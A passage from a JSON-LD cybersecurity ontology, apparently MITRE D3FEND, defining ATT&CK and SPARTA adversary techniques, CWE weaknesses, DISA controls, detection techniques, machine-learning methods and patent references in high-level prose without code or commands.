      "d3f:definition": "A software artifact server provides access to the software artifacts in a software repository. A software repository, or \"repo\" for short, is a storage location for software packages. Often a table of contents is stored, as well as metadata. Repositories group packages. Sometimes the grouping is for a programming language, such as CPAN for the Perl programming language, sometimes for an entire operating system, sometimes the license of the contents is the criteria. At client side, a package manager helps installing from and updating the repositories.",
      "rdfs:label": "Software Artifact Server",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Software_repository"
        },
        {
          "@id": "dbr:Artifact_(software_development)"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ArtifactServer"
      }
    },
    {
      "@id": "d3f:T1588.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588.005",
      "d3f:definition": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)",
      "rdfs:label": "Exploits",
      "rdfs:subClassOf": {
        "@id": "d3f:T1588"
      }
    },
    {
      "@id": "d3f:CWE-318",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-318",
      "d3f:definition": "The product stores sensitive information in cleartext in an executable.",
      "rdfs:label": "Cleartext Storage of Sensitive Information in Executable",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-312"
      }
    },
    {
      "@id": "d3f:GetSystemNetworkConfigValue",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Get System Network Config Value",
      "rdfs:subClassOf": {
        "@id": "d3f:GetSystemConfigValue"
      }
    },
    {
      "@id": "d3f:HostGroup",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Host"
      },
      "d3f:definition": "A collection of Hosts used to allow operations such as access control to be applied to the entire group.",
      "rdfs:label": "Host Group",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessControlGroup"
        },
        {
          "@id": "_:N13e651949bba431a8f200531c300e9cc"
        }
      ]
    },
    {
      "@id": "_:N13e651949bba431a8f200531c300e9cc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:T1070.010",
      "@type": "owl:Class",
      "d3f:attack-id": "T1070.010",
      "d3f:definition": "Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.",
      "rdfs:label": "Relocate Malware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1070"
      }
    },
    {
      "@id": "d3f:IA-0008.03",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0008.03",
      "d3f:definition": "Adversaries leverage counterspace platforms to create conditions under which initial execution becomes possible or to impose effects directly. Electronic warfare systems can jam or spoof links so that the target shifts to contingency channels or accepts crafted navigation/control signals; directed-energy systems can dazzle sensors or upset electronics, shaping mode transitions and autonomy responses; kinetic or contact-capable systems can enable mechanical interaction that exposes maintenance or debug paths. In each case, the counterspace asset is an external actor-controlled node that interacts with the spacecraft outside authorized ground pathways. Initial access may be the immediate result of accepted spoofed traffic, or it may be secondary, arising when the target enters states with broader command acceptance, alternative receivers, or service interfaces that the adversary can then exploit.",
      "rdfs:label": "ASAT/Counterspace Weapon - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0008/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0008"
      },
      "skos:prefLabel": "ASAT/Counterspace Weapon"
    },
    {
      "@id": "rdfs:isDefinedBy",
      "@type": "owl:AnnotationProperty",
      "rdfs:label": "isDefinedBy"
    },
    {
      "@id": "d3f:CWE-1341",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1341",
      "d3f:definition": "The product attempts to close or release a resource or handle more than once, without any successful open between the close operations.",
      "rdfs:label": "Multiple Releases of Same Resource or Handle",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-675"
      }
    },
    {
      "@id": "d3f:T0827",
      "@type": "owl:Class",
      "d3f:attack-id": "T0827",
      "d3f:definition": "Adversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)",
      "rdfs:label": "Loss of Control - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Loss of Control"
    },
    {
      "@id": "d3f:T1512",
      "@type": "owl:Class",
      "d3f:attack-id": "T1512",
      "d3f:definition": "An adversary can leverage a device’s cameras to gather information by capturing video recordings. Images may also be captured, potentially in specified intervals, in lieu of video files.",
      "rdfs:label": "Video Capture - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Video Capture"
    },
    {
      "@id": "d3f:ServiceInstallationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the installation or registration of a service application within the system, enabling it to provide background or reusable functionality.",
      "rdfs:label": "Service Installation Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationInstallationEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        }
      ]
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-009%3ACertUtilWithDecodeArgument_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-009/"
      },
      "d3f:kb-abstract": "CertUtil.exe may be used to encode and decode a file, including PE and script code. Encoding will convert a file to base64 with -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- tags. Malicious usage will include decoding a encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - encodehex and decodehex. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-009: CertUtil With Decode Argument",
      "rdfs:label": "Reference - CAR-2021-05-009: CertUtil With Decode Argument - MITRE"
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForDetectingThreatsUsingPassiveClusterMapping_VectraNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160149936A1"
      },
      "d3f:kb-abstract": "An approach for detecting network threats is disclosed, that may involve receiving network traffic, plotting the network traffic in a n-dimensional feature space to form a network map, generating a client signature at least by placing new client points in the map, setting a threshold, and generating an alarm if one or more client activity points exceed the threshold. In some embodiments, the network map and the client signature are updated using sliding windows and distance calculations.",
      "d3f:kb-author": "David Lopes PEGNA; Nicolas Beauchesne",
      "d3f:kb-mitre-analysis": "This patent describes detecting network threats by first passively collecting network traffic and storing it for processing. The stored network traffic data is used to map network events to create a cluster map. Events are network activity associated with clients, servers, or control modules such as a Kerberos Domain Controller (KDC); account information; services accessed by the client; or the number of times a service is accessed. Events that exceed a threshold from a center of gravity point of a cluster are identified as suspicious activity and an alert is generated.",
      "d3f:kb-organization": "Vectra Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProtocolMetadataAnomalyDetection"
      },
      "d3f:kb-reference-title": "Method and system for detecting threats using passive cluster mapping",
      "rdfs:label": "Reference - Method and system for detecting threats using passive cluster mapping - Vectra Networks Inc"
    },
    {
      "@id": "d3f:title",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "A name given to the resource.",
      "rdfs:label": {
        "@language": "en",
        "@value": "title"
      },
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:broader-transitive",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x broader-transitive y: The entity x represents a more general concept than entity y, including indirect or hierarchical relationships where x encompasses y through intermediate entities.",
      "rdfs:label": "broader-transitive",
      "rdfs:subPropertyOf": {
        "@id": "d3f:semantic-relation"
      }
    },
    {
      "@id": "d3f:T1213.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1213.005",
      "d3f:definition": "Adversaries may leverage chat and messaging applications, such as Microsoft Teams, Google Chat, and Slack, to mine valuable information.",
      "rdfs:label": "Messaging Applications",
      "rdfs:subClassOf": {
        "@id": "d3f:T1213"
      }
    },
    {
      "@id": "d3f:T1218.010",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218.010",
      "d3f:definition": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)",
      "rdfs:label": "Regsvr32",
      "rdfs:subClassOf": {
        "@id": "d3f:T1218"
      }
    },
    {
      "@id": "d3f:Semi-supervisedSelf-training",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSST",
      "d3f:definition": "Self-training is the procedure in which a supervised method for classification or regression is modified it to work in a semi-supervised manner, taking advantage of labeled and unlabeled data",
      "d3f:kb-article": "## References\nAltexSoft. (n.d.). Semi-Supervised Learning: A Technical Guide with Python Examples. [Link](https://www.altexsoft.com/blog/semi-supervised-learning/#:~:text=One%20of%20the%20simplest%20examples,of%20labeled%20and%20unlabeled%20data.)",
      "rdfs:label": "Semi-supervised Self-training",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-supervisedWrapperMethod"
      }
    },
    {
      "@id": "d3f:ArtificialNeuralNetClassification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-annotation": "Classification ANNs seek to classify an observation as belonging to some discrete class as a function of the inputs. The input features (independent variables) can be categorical or numeric types, however, we require a categorical feature as the dependent variable.",
      "d3f:d3fend-id": "D3A-ANNC",
      "d3f:kb-article": "## References\nANN Classification. [Link](http://uc-r.github.io/ann_classification).",
      "rdfs:label": "Artificial Neural Network Classification",
      "rdfs:subClassOf": {
        "@id": "d3f:Classification"
      }
    },
    {
      "@id": "d3f:CCI-000772_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uses multifactor authentication for network access to non-privileged accounts where one of the factors is provided by a device separate from the information system being accessed.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000772"
    },
    {
      "@id": "d3f:d3fend-external-control-data-property",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": "d3fend-external-control-data-property",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:d3fend-catalog-data-property"
        },
        {
          "@id": "d3f:d3fend-data-property"
        }
      ]
    },
    {
      "@id": "d3f:DomainNameReputationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DomainNameReputationAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:DomainName"
      },
      "d3f:d3fend-id": "D3-DNRA",
      "d3f:definition": "Analyzing the reputation of a domain name.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-Database_for_receiving_storing_and_compiling_information_about_email_messages"
        },
        {
          "@id": "d3f:Reference-Finding_phishing_sites"
        }
      ],
      "rdfs:label": "Domain Name Reputation Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IdentifierReputationAnalysis"
        },
        {
          "@id": "_:Na9354d1bc97544599598e945b3f3eb13"
        }
      ]
    },
    {
      "@id": "_:Na9354d1bc97544599598e945b3f3eb13",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainName"
      }
    },
    {
      "@id": "d3f:RemoteTerminalSessionDetection",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RemoteTerminalSessionDetection"
      ],
      "d3f:analyzes": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:d3fend-id": "D3-RTSD",
      "d3f:definition": "Detection of an unauthorized remote live terminal console session by examining network traffic to a network host.",
      "d3f:kb-article": "## How it works\nAn external attacker takes remote control of a host inside a company or organization's network and manually directs offensive techniques. Nonstandard terminal sessions and abnormal behaviors are analyzed in this technique. Abnormal behavior detection includes analysis of user input patterns in the real-time session, keyboard output and packet inspection.\n\n### Network Traffic Inspection\nNetwork traffic from internal hosts is the main concern and focus for the traffic inspection. The network traffic is collected into inspection groups. The groups of traffic are assembled into distinct pair flows (outbound/inbound) and the pair flows are further divided into sessions. Only sessions originated inside of the network are considered for the inspection. Traffic inspection includes analysis to determine if a human is involved in the session exchanges. Time-based statistics are captured for each session being analyzed by the detection engine.\n\n### Algorithm Analysis Description\nAnalysis algorithms look for patterns in the network traffic captured from the session data.  A detection engine groups the session traffic data, between the hosts, into rapid exchange instances. Analysis of rapid exchange traffic patterns can lead to the discovery of abnormal behavior which is indicative of a compromised internal host. The analysis algorithms look for patterns in the traffic which correlate to known activity (e.g., relay attacks, bot activity, bitcoin mining). Some metrics used during inspection include the following.\n\n* Number of rapid-exchange instances\n* Time interval between packets\n* Fixed cadence of traffic\n* Rhythm and direction of the initiation of instances\n* Volume of data flowing from internal to external controlling host\n* Data transfer characteristics\n* Variability in length of silent periods\n\n## Considerations\n* Full packet capture is required which can be process intensive to analyze\n* Attackers that move low and slow may blend in with existing traffic resulting in false negatives",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndSystemForDetectingExternalControlOfCompromisedHosts_VECTRANETWORKSInc"
        },
        {
          "@id": "d3f:Reference-RDPConnectionDetection_MITRE"
        },
        {
          "@id": "d3f:Reference-RemoteDesktopLogon_MITRE"
        }
      ],
      "rdfs:label": "Remote Terminal Session Detection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N31c69b15d03041e5bdc8bd16936d6138"
        }
      ]
    },
    {
      "@id": "_:N31c69b15d03041e5bdc8bd16936d6138",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1587.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1587.004",
      "d3f:definition": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)",
      "rdfs:label": "Exploits",
      "rdfs:subClassOf": {
        "@id": "d3f:T1587"
      }
    },
    {
      "@id": "d3f:NTPSymmetricActiveExchangeEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an NTP peer operating in symmetric active mode initiates clock synchronization messages to a peer in symmetric passive mode, enabling time synchronization between equal-status systems.",
      "rdfs:label": "NTP Symmetric Active Exchange Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NTPEvent"
      }
    },
    {
      "@id": "d3f:IA-0012",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0012",
      "d3f:definition": "Assembly, Test, and Launch Operation (ATLO) concentrates people, tools, and authority while components first exchange real traffic across flight interfaces. Test controllers, EGSE, simulators, flatsats, loaders, and data recorders connect to the same buses and command paths that will exist on orbit. Threat actors exploit this density and dynamism: compromised laptops or transient cyber assets push images and tables; lab networks bridge otherwise separate enclaves; vendor support accounts move software between staging and flight hardware; and “golden” artifacts created or modified in ATLO propagate into the as-flown baseline. Malware can traverse shared storage and scripting environments, ride update/checklist execution, or piggyback on protocol translators and gateways used to stimulate subsystems. Because ATLO often introduces late firmware loads, key/counter initialization, configuration freezes, and full-system rehearsals, a single well-placed change can yield first execution on multiple devices and persist into LEOP.",
      "rdfs:label": "Assembly, Test, and Launch Operation Compromise - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0012/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Assembly, Test, and Launch Operation Compromise"
    },
    {
      "@id": "d3f:CCI-001125_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces adherence to protocol format.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001125"
    },
    {
      "@id": "d3f:T1526",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1526",
      "d3f:definition": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.",
      "d3f:reads": {
        "@id": "d3f:CloudConfiguration"
      },
      "rdfs:label": "Cloud Service Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N41665a1830c64cd8807fb7b97f9aa18b"
        }
      ]
    },
    {
      "@id": "_:N41665a1830c64cd8807fb7b97f9aa18b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:CCI-002467_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system performs data integrity verification on the name/address resolution responses the system receives from authoritative sources.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DNSTrafficAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002467"
    },
    {
      "@id": "d3f:WindowsNtCreateNamedPipeFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Creates Named Pipe File Object.",
      "rdfs:label": "Windows NtCreateNamedPipeFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:Reference-ProtectingAgainstDistributedNetworkFloodAttacks-JuniperNetworksInc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8789173B2"
      },
      "d3f:kb-abstract": "A network security device performs a three-stage analysis of traffic to identify malicious clients. In one example, a device includes an attack detection module to, during a first stage, monitor network connections to a protected network device, during a second stage, to monitor a plurality of types of transactions for the plurality of network sessions when a parameter for the connections exceeds a connection threshold, and during a third stage, to monitor communications associated with network addresses from which transactions of the at least one of type of transactions originate when a parameter associated with the at least one type of transactions exceeds a transaction-type threshold. The device executes a programmed action with respect to at least one of the network addresses when the transactions of the at least one of the plurality of types of transactions originating from the at least one network address exceeds a client-transaction threshold.",
      "d3f:kb-author": "Krishna Narayanaswamy, Bryan Burns, Venkata Rama Raju Manthena",
      "d3f:kb-organization": "Juniper Networks Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundSessionVolumeAnalysis"
      },
      "d3f:kb-reference-title": "Protecting against distributed network flood attacks",
      "rdfs:label": "Reference - Protecting against distributed network flood attacks - Juniper Networks Inc."
    },
    {
      "@id": "d3f:T1163",
      "@type": "owl:Class",
      "d3f:attack-id": "T1163",
      "d3f:definition": "During the boot process, macOS executes <code>source /etc/rc.common</code>, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1037.004",
      "rdfs:label": "Rc.common",
      "rdfs:seeAlso": {
        "@id": "d3f:T1037.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:T1605",
      "@type": "owl:Class",
      "d3f:attack-id": "T1605",
      "d3f:definition": "Adversaries may use built-in command-line interfaces to interact with the device and execute commands. Android provides a bash shell that can be interacted with over the Android Debug Bridge (ADB) or programmatically using Java’s `Runtime` package. On iOS, adversaries can interact with the underlying runtime shell if the device has been jailbroken.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1623.001",
      "rdfs:label": "Command-Line Interface - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1623.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileExecutionTechnique"
      },
      "skos:prefLabel": "Command-Line Interface"
    },
    {
      "@id": "d3f:HTTPSURL",
      "@type": [
        "owl:NamedIndividual",
        "d3f:URL"
      ],
      "rdfs:label": "HTTPS URL"
    },
    {
      "@id": "d3f:TrustStore",
      "@type": "owl:Class",
      "d3f:definition": "Stores public information necessary to determine if another party can be trusted.",
      "rdfs:label": "Trust Store",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Public_key_certificate"
        },
        {
          "@id": "https://www.educative.io/edpresso/keystore-vs-truststore"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:Signal",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In electronics and telecommunications, signal refers to any time-varying voltage, current, or electromagnetic wave that carries information.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Signal"
      },
      "rdfs:label": "Signal",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalArtifact"
        },
        {
          "@id": "_:N3345672d4d3e44bd9f2db475ed5a6ebd"
        }
      ]
    },
    {
      "@id": "_:N3345672d4d3e44bd9f2db475ed5a6ebd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:carries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:T1218.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218.008",
      "d3f:definition": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.",
      "rdfs:label": "Odbcconf",
      "rdfs:subClassOf": {
        "@id": "d3f:T1218"
      }
    },
    {
      "@id": "d3f:REC-0008",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0008",
      "d3f:definition": "Threat actors map the end-to-end pathway by which hardware, software, data, and people move from design through AIT, launch, and on-orbit sustainment. They catalog manufacturers and lots, test and calibration houses, logistics routes and waypoints, integrator touchpoints, key certificates and tooling, update and key-loading procedures, and who holds custody at each handoff. They correlate this with procurement artifacts, SBOMs, BOMs, and service contracts to locate where trust is assumed rather than verified. Particular attention falls on exceptions, engineering builds, rework tickets, advance replacements, depot repairs, and urgent field updates, because controls are frequently relaxed there. The result is a prioritized list of choke points (board fabrication, FPGA bitstream signing, image repositories, CI/CD runners, cloud artifact stores, freight forwarders) where compromise yields outsized effect.",
      "rdfs:label": "Gather Supply Chain Information - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0008/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather Supply Chain Information"
    },
    {
      "@id": "d3f:DynamicAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DynamicAnalysis"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:DocumentFile"
        },
        {
          "@id": "d3f:ExecutableFile"
        }
      ],
      "d3f:d3fend-id": "D3-DA",
      "d3f:definition": "Executing or opening a file in a synthetic \"sandbox\" environment to determine if the file is a malicious program or if the file exploits another program such as a document reader.",
      "d3f:kb-article": "## How it works\nAnalyzing the interaction of a piece of code with a system while the code is being executed in a controlled environment such as a sandbox, virtual machine, or simulator. This exposes the natural behavior of the piece of code without requiring the code to be disassembled.\n\n## Considerations\n * Malware often detects a fake environment, then changes its behavior accordingly. For example, it could detect that the system clock is being sped up in an effort to get it to execute commands that it would normally only execute at a later time, or that the hardware manufacturer of the machine is a virtualization provider.\n * Malware can attempt to determine if it is being debugged, and change its behavior accordingly.\n * For maximum fidelity, the simulated and real environments should be as similar as possible because the malware could perform differently in different environments.\n * Sometimes the malware behavior is triggered only under certain conditions (on a specific system date, after a certain time, or after it is sent a specific command) and can't be detected through a short execution in a virtual environment.\n\n## Implementations\n* Cuckoo Sandbox",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MalwareAnalysisSystem_PaloAltoNetworksInc"
        },
        {
          "@id": "d3f:Reference-UseOfAnApplicationControllerToMonitorAndControlSoftwareFileAndApplicationEnvironments_SophosLtd"
        }
      ],
      "d3f:synonym": [
        "Malware Detonation",
        "Malware Sandbox"
      ],
      "rdfs:label": "Dynamic Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "_:N3eeb73bccd964544829df9398da86f8a"
        },
        {
          "@id": "_:Nc8d329a7d2f443fcb936a1c099a33ba5"
        }
      ]
    },
    {
      "@id": "_:N3eeb73bccd964544829df9398da86f8a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DocumentFile"
      }
    },
    {
      "@id": "_:Nc8d329a7d2f443fcb936a1c099a33ba5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:CycleGAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CYC",
      "d3f:definition": "The Cycle Generative Adversarial Network (CycleGAN) is an approach to training a deep convolutional neural network for image-to-image translation tasks by mapping between input and output images using unpaired dataset.",
      "d3f:kb-article": "## References\nEsri. (n.d.). How CycleGAN Works. [Link](https://developers.arcgis.com/python/guide/how-cyclegan-works/)",
      "rdfs:label": "CycleGAN",
      "rdfs:subClassOf": {
        "@id": "d3f:Image-to-ImageTranslationGAN"
      }
    },
    {
      "@id": "d3f:RDPConnectRequestEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an RDP client sends a connection request specifying session parameters, such as display settings, compression preferences, and security requirements, to prepare for an interactive session.",
      "rdfs:label": "RDP Connect Request Event",
      "rdfs:subClassOf": {
        "@id": "d3f:RDPEvent"
      }
    },
    {
      "@id": "d3f:EncoderApplication",
      "@type": "owl:Class",
      "d3f:definition": "An application that encodes digital data.",
      "rdfs:label": "Encoder Application",
      "rdfs:subClassOf": {
        "@id": "d3f:CodecApplication"
      }
    },
    {
      "@id": "d3f:CWE-1242",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1242",
      "d3f:definition": "The device includes chicken bits or undocumented features that can create entry points for unauthorized actors.",
      "rdfs:label": "Inclusion of Undocumented Features or Chicken Bits",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-284"
        },
        {
          "@id": "d3f:CWE-912"
        }
      ]
    },
    {
      "@id": "d3f:CWE-911",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-911",
      "d3f:definition": "The product uses a reference count to manage a resource, but it does not update or incorrectly updates the reference count.",
      "rdfs:label": "Improper Update of Reference Count",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:FileCreationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the creation of a new file within the system, establishing its existence and initial attributes in the file system or storage medium.",
      "rdfs:label": "File Creation Event",
      "rdfs:subClassOf": {
        "@id": "d3f:FileEvent"
      }
    },
    {
      "@id": "d3f:T1547.010",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
